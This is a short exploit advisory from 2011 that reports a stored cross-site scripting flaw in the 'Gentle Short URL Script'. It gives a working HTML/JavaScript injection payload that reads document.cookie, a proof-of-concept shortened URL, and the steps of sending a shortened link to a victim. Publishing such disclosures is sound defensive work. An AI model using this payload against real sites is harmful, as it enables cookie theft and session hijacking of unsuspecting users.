Gentle Short URL script suffers from a cross site scripting vulnerability.
29e95c4a0e5a0077b4c547f724851ee1dec437820f767b47313bd91ab502bd02
# Exploit Title: Gentle Short URL Script Stored XSS
# Date: 2011
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability
# Web Site: www.eyupcelik.com.tr
ISSUE
Link shorten, send to a victim.
Vulnerable Module: Shorten URL Statics
The end of the shortened link ! mentions
Exploit:
"/></a></><img src=1.gif onerror=alert(document.cookie)>
POC:
http://unrelo.com/PJls!
Thanks,
Eyup CELIK
Information Technology Security Specialist
http://www.eyupcelik.com.tr